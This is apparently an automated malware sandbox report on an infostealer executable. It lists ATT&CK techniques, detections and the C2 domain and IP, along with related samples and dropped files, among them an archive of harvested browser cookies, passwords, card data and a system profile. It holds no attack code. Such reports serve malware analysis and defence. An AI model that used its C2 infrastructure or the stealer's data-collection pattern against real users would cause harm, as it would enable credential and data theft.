Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing13	NTDS	System Information Discovery47	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery121	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Process Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection11	DCSync	Virtualization/Sandbox Evasion21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
buIKlB688e.exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\sqlite3.dll	3%	Metadefender	Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.buIKlB688e.exe.4038f60.4.unpack	100%	Avira	TR/Patched.Ren.Gen		Download File
5.2.buIKlB688e.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1136795		Download File

Domains

Source	Detection	Scanner	Label	Link
chrisproperties.xyz	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://chrisproperties.xyz/4.jpg:	0%	Avira URL Cloud	safe
http://chrisproperties.xyz/main.php.	0%	Avira URL Cloud	safe
http://chrisproperties.xyz/6.jpgj	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://chrisproperties.xyz/3.jpg	100%	Avira URL Cloud	phishing
http://www.fontbureau.comic9	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://chrisproperties.xyz/2.jpg	100%	Avira URL Cloud	phishing
http://www.tiro.com	0%	URL Reputation	safe
http://chrisproperties.xyz/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fontbureau.comiono$	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://chrisproperties.xyz/main.php	100%	Avira URL Cloud	phishing
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://chrisproperties.xyz/1.jpg	100%	Avira URL Cloud	phishing
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://chrisproperties.xyz/7.jpg	100%	Avira URL Cloud	phishing
http://chrisproperties.xyz/1.jpg$	0%	Avira URL Cloud	safe
http://chrisproperties.xyz/6.jpg	100%	Avira URL Cloud	phishing
http://chrisproperties.xyz/2.jpgB	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://chrisproperties.xyz/5.jpg	100%	Avira URL Cloud	phishing
http://www.fontbureau.comoj	0%	Avira URL Cloud	safe
http://chrisproperties.xyz/4.jpg	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chrisproperties.xyz	195.133.18.140	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://chrisproperties.xyz/3.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/2.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/	true	Avira URL Cloud: safe	unknown
http://chrisproperties.xyz/main.php	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/1.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/7.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/6.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/5.jpg	true	Avira URL Cloud: phishing	unknown
http://chrisproperties.xyz/4.jpg	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://chrisproperties.xyz/4.jpg:	buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://chrisproperties.xyz/main.php.	buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	temp.5.dr	false		high
http://www.fontbureau.com/designersG	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	temp.5.dr	false		high
http://chrisproperties.xyz/6.jpgj	buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/answer/6258784	buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comic9	buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	true	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	buIKlB688e.exe, 00000005.00000002.389874310.0000000003320000.00000004.00000001.sdmp	false		high
http://www.tiro.com	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.fontbureau.comiono$	buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	low
http://www.collada.org/2005/11/COLLADASchema9Done	buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.sajatypeworks.com	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.typography.netD	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://fontfabrik.com	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	false		high
http://www.galapagosdesign.com/DPlease	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.fonts.com	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.sakkal.com	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.5.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	temp.5.dr	false		high
http://ocsp.thawte.com0	buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp, mozglue.dll.5.dr	true	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	temp.5.dr	false		high
http://chrisproperties.xyz/1.jpg$	buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	temp.5.dr	false		high
http://chrisproperties.xyz/2.jpgB	buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	temp.5.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtabSQLite	temp.5.dr	false		high
http://www.fontbureau.com/designers8	buIKlB688e.exe, 00000000.00000002.377590506.0000000006EC2000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comoj	buIKlB688e.exe, 00000000.00000002.370505153.0000000001217000.00000004.00000040.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	temp.5.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	temp.5.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
195.133.18.140	chrisproperties.xyz	Russian Federation		197695	AS-REGRU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	500963
Start date:	12.10.2021
Start time:	12:34:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	buIKlB688e.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/13@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.7% (good quality ratio 27.6%) Quality average: 80.3% Quality standard deviation: 26.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.82.210.154, 52.251.79.25, 2.20.178.10, 2.20.178.56, 20.54.110.249, 40.112.88.60, 20.82.209.183, 2.20.178.24, 2.20.178.33, 95.100.216.89, 20.50.102.62 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:35:32	API Interceptor	2x Sleep call for process: buIKlB688e.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
195.133.18.140	SZIJ791077 Brazil.xlsx	Get hash	malicious	Browse	chrisproperties.xyz/
	PURCHASE ORDER.doc	Get hash	malicious	Browse	nestlex.tk/obinnazx.exe
	CV.doc	Get hash	malicious	Browse	nestlex.tk/harshmanzx.exe
	SCAN_20161017_151638921_002.doc	Get hash	malicious	Browse	nestlex.tk/templezx.exe
	JAKjm9895D.exe	Get hash	malicious	Browse	chrisproperties.xyz/
	famz10.doc	Get hash	malicious	Browse	nestlex.tk/famzx.exe
	6cSzeDpR8H.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	Purchase orderGT4366.doc	Get hash	malicious	Browse	nestlex.tk/haitianzx.exe
	5400040115 Pratincole Pacific PRAT-RR-21-H070 DELMAR MARINE SERVICES PTE LTD.xlsx	Get hash	malicious	Browse	lg-tvproducts.xyz/
	8LG5vyqgIT.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	Remittance Payment Voucher HDFC_EFT_300921_9562.doc	Get hash	malicious	Browse	nestlex.tk/mavzx.exe
	qILIw8EEok.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	MT103-384849392983.doc	Get hash	malicious	Browse	nestlex.tk/obizx.exe
	iuveFh5hgJ.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	Order confirmation MSDHG021098.doc	Get hash	malicious	Browse	lg-tvproducts.xyz/
	5400040115 Pratincole Pacific PRAT-RR-21-H070 DELMAR MARINE SERVICES PTE LTD.doc	Get hash	malicious	Browse	lg-tvproducts.xyz/
	5400040115 Pratincole Pacific PRAT-RR-21-H070 DELMAR MARINE SERVICES PTE LTD.xlsx	Get hash	malicious	Browse	lg-tvproducts.xyz/
	Qa0uWGDyeZ.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	9xODIYlvCh.exe	Get hash	malicious	Browse	lg-tvproducts.xyz/
	Required PO 001.exe	Get hash	malicious	Browse	samsungprod.xyz/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
chrisproperties.xyz	SZIJ791077 Brazil.xlsx	Get hash	malicious	Browse	195.133.18.140
chrisproperties.xyz	JAKjm9895D.exe	Get hash	malicious	Browse	195.133.18.140

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-REGRU	Cu71vDdE5w.exe	Get hash	malicious	Browse	91.224.22.228
	iwTiB0dgnZ.exe	Get hash	malicious	Browse	91.224.22.228
	bcJ2CVVot9.exe	Get hash	malicious	Browse	91.224.22.228
	SZIJ791077 Brazil.xlsx	Get hash	malicious	Browse	195.133.18.140
	PURCHASE ORDER.doc	Get hash	malicious	Browse	195.133.18.140
	CV.doc	Get hash	malicious	Browse	195.133.18.140
	SCAN_20161017_151638921_002.doc	Get hash	malicious	Browse	195.133.18.140
	setup_x86_x64_install.exe	Get hash	malicious	Browse	91.224.22.228
	JAKjm9895D.exe	Get hash	malicious	Browse	195.133.18.140
	P2AN3Yrtnz.exe	Get hash	malicious	Browse	91.224.22.228
	Pa4gjPt0LW.exe	Get hash	malicious	Browse	91.224.22.228
	famz10.doc	Get hash	malicious	Browse	195.133.18.140
	uREuYeoe7F.exe	Get hash	malicious	Browse	195.133.18.117
	l47D1F6BWK.exe	Get hash	malicious	Browse	195.133.18.117
	TNIZtb3HS3.exe	Get hash	malicious	Browse	91.224.22.228
	DqvtaJLisV.exe	Get hash	malicious	Browse	91.224.22.228
	w347KbpZ6t.exe	Get hash	malicious	Browse	91.224.22.228
	V5cy4riN4O.exe	Get hash	malicious	Browse	91.224.22.228
	setup_x86_x64_install.exe	Get hash	malicious	Browse	91.224.22.228
	Hm7d40tE44.exe	Get hash	malicious	Browse	91.224.22.228

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\freebl3.dll	Cu71vDdE5w.exe	Get hash	malicious	Browse
	20znh7W3Y1.exe	Get hash	malicious	Browse
	SZIJ791077 Brazil.xlsx	Get hash	malicious	Browse
	JAKjm9895D.exe	Get hash	malicious	Browse
	9pJXfhJSjO.exe	Get hash	malicious	Browse
	Xn2MuorsTC.exe	Get hash	malicious	Browse
	XsgPPVkaMP.exe	Get hash	malicious	Browse
	fWadL3DSQw.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.MulDropNET.43.8032.exe	Get hash	malicious	Browse
	DqvtaJLisV.exe	Get hash	malicious	Browse
	w347KbpZ6t.exe	Get hash	malicious	Browse
	V5cy4riN4O.exe	Get hash	malicious	Browse
	sPp0dD63Dt.exe	Get hash	malicious	Browse
	setup_x86_x64_install.exe	Get hash	malicious	Browse
	0goCbw8S8f.exe	Get hash	malicious	Browse
	otJgx8JkpE.exe	Get hash	malicious	Browse
	SvmhQnz5E2.exe	Get hash	malicious	Browse
	Jl7TdlxE2X.exe	Get hash	malicious	Browse
	6cSzeDpR8H.exe	Get hash	malicious	Browse
	ABB98RdRjb.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\734573140483756\_7345731404.zip Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	77923
Entropy (8bit):	7.990500102882689
Encrypted:	true
SSDEEP:	1536:MxVmeNFu4jA4WZzwNRaqqfbvjcXkX0TqB3zEEaqOJ5ZNfrldl9sY:MuiFJjTWZzmklfbvgXkX0TEjExR3frlt
MD5:	35B096534FD5FB3BE16137D30062972A
SHA1:	0063DB1FA7A0326A5A158D3895C0920BA64BCD0C
SHA-256:	4CFC5034491735DF9F8D6F81710F407AA250B12F46B961DD1B791AE03E87C1CC
SHA-512:	7F6BA21E3AA6EA7CC6BEAE259411F058577A25B3C48F21FE54E1AE01CA2FA4C9BCAF6DA9B25DB7AA47B369584E3FACEF47F4D7EE6456E58E87EC7D7958E90B52
Malicious:	false
Reputation:	low
Preview:	PK........p.LS............"...autofill/Google Chrome_Default.txtUT.....ea..ea..ea..PK........p.LS............"...autofill/Google Chrome_Default.txtUT.....ea..ea..eaPK........p.LS................cc/Google Chrome_Default.txtUT.....ea..ea..ea..PK........p.LS................cc/Google Chrome_Default.txtUT.....ea..ea..eaPK........p.LS............!...cookies/Google Chrome_Default.txtUT.....ea..ea..ea-..r.0...5..hK@....<x...R..\ ..2tj...nz6g..I.5L_....y......A....^........"...n.]....YL2..E[_....U...%KY.jv.bTw..#..6......w...@5...H....)..Bp./A<......>........(.)=..B.V.s.s...5.C.Sx~..PK........p.LSp...........!...cookies/Google Chrome_Default.txtUT.....ea..ea..eaPK........p.LS................outlook.txtUT.....ea..ea..ea..PK........p.LS................outlook.txtUT.....ea..ea..eaPK........p.LS................passwords.txtUT.....ea..ea..ea..PK........p.LS................passwords.txtUT.....ea..ea..eaPK........r.LS.........4......screenshot.jpgUT.....ea..ea..ea...X.].>....(`@@.T.0H..)b.

C:\ProgramData\734573140483756\cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.748326181791092
Encrypted:	false
SSDEEP:	6:PkopYjdfOoX51TbDgivd4YMrd71DLE7XGsTQ4DW:copYxfOop1Tt4YYd7JL8h3i
MD5:	0E37A051C705869E8440255E0C5A4D82
SHA1:	AEF4B628215185F8FEA4681ECD2F77FF892F6033
SHA-256:	4652C43B2F5D51B901F1D6828024918F1E7358B2931CACB5D1B18BD0E4A99A6A
SHA-512:	DE12E5F572671107C198E9D3C16FCD02B8212D47A70692C10E7E59EA037CA79BC2B4AB1042810B7D7C37C576FF679DA4C31E0FC85B2B8048B4D7651A26F20BB0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.google.com.FALSE./.FALSE.1617283352.NID.204=XlJ-cT9Xg8DDNcFChe-nUGbxxEez8DRPGzgzUdZjP1JdN2YiNhfyRKFYdvFacUiguPGJxNZQxNzSiNVBcKqtq4ja7gbbvS3qQExvrcATH8SyD8dfy7IhIXh65vwy9wvzcYGB8MPR2c8HHGKEWDbc9DczP4qY4Ggc7D8ZFucZfEc..

C:\ProgramData\734573140483756\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	79098
Entropy (8bit):	7.868660478353564
Encrypted:	false
SSDEEP:	1536:/xGO5htVQpaOtsCxJbEsX1f/iT2UwD4wlrcun1dZ9kEDiQxpfmcC2V:pGQ6plosFfqvu4qDZ9XDiKpfm+V
MD5:	CC9F2BA94B855E85B67BE3DC11C00E93
SHA1:	016F7C54EE871C22E17004037B7DCDF377C0C9EF
SHA-256:	630B27B324FD10266FAE198A43CA9269489BA73B916BE8BAEB5F7CD975AE3245
SHA-512:	62AA259A17EC84FFF1EFCEB6F80D5797F210D50E79868C3D6566DAEAD78D37781B6050F861E1144C48D356EA1B076939B0079C3C2D3E9D11F828AB297DB60302
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1E..+....+R.....r..V.HY.m.q.......o...s<.-........RrHi6r.....i...#...36........J2lo#..9......E.i...%[.......XA8Ve.[....Uj...Ju%.!..4..4.W.M.e.l6...~.....G........$...:..a.N._...#.a....1...P.....3..I...u.Z...n.ya.y.e...n..g..V.q4.6...:S...QEt...Q@..)k.>..'C.N.yq...$..lVIYx..8..QWcJ.....?.\|...>......\|!..>.?.....%.6\|.Ez.~..}..O.......y.y..N9..%.7.F.D(.p......

C:\ProgramData\734573140483756\system.txt Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	9547
Entropy (8bit):	5.116072549066319
Encrypted:	false
SSDEEP:	96:7cblOkFrVF4zZuauz0NpIKXDplsdM984uRAuzQ7uZUM9QYh1FcGEcLbLaAhy0/rG:7oOq5oZPewHranRAJhusXca4hLCPTNAY
MD5:	3D77F8EA5CA38FD9D04FB3DAD59D2582
SHA1:	E24F6C50AB4EA77BAF7AF1B5D2CE12DCC27DAD71
SHA-256:	D4E39E2B71BEDE430704A3F0E754AED44B6E77A879C17DAF94F0DC004CF1243D
SHA-512:	37D5B241C14F459A7977DC843D1638AA895DCA8B275B8DB7412C20812C08480D4D412FA5F12CF5224CB323DC9496B641191FDB5D80B69437CBBEE5DFF534F161
Malicious:	false
Reputation:	low
Preview:	System ---------------------------------------------------..Windows: Windows 10 Pro..Bit: x64..User: user..Computer Name: 841618..System Language: en-US..Machine ID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..Domain Name: Unknown..Workgroup: CURQNKV..Keyboard Languages: English (United States)....Hardware -------------------------------------------------..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Logical processors: 4..Videocard: Microsoft Basic Display Adapter..Display: 1280x1024..RAM: 8191 MB..Laptop: No....Time -----------------------------------------------------..Local: 12/10/2021 12:35:40..Zone: UTC-8....Network --------------------------------------------------..IP: IP?..Country: Country?....Installed Softwrare --------------------------------------..Google Chrome 85.0.4183.121..Microsoft Office Professional Plus 2016 16.0.4266.1001..Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0..Microsoft Visual C

C:\ProgramData\734573140483756\temp Download File
Process:	C:\Users\user\Desktop\buIKlB688e.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	208896
Entropy (8bit):	1.0725713486532351
Encrypted:	false
SSDEEP:	384:7YafBI0olG4oN03r9lgbFB/1Vum73r9lgbFB/1Vumq:kG20olG4oNQraFB/JraFB/Q
MD5:	5FDB0AD7C317DDBE8B27E0A727284F24
SHA1:	197736EEEA00A884475EDAD158B178A245874A12
SHA-256:	3EAC1FF43DBE86A8291F1FFB7707A096FC2F27E48E34249D090053C58F665E59
SHA-512:	B711BEE9D15D0C4D6A46FB847EBFF0EA0B4EA777194C2B651ADF0D19FCC4E5A701010CF2F1F57DD02087183CBE86DE18FA8880CECE9E0D5B079FD28E9E1D0D24
Malicious:	false
Reputation:	moderate, very likely benign file
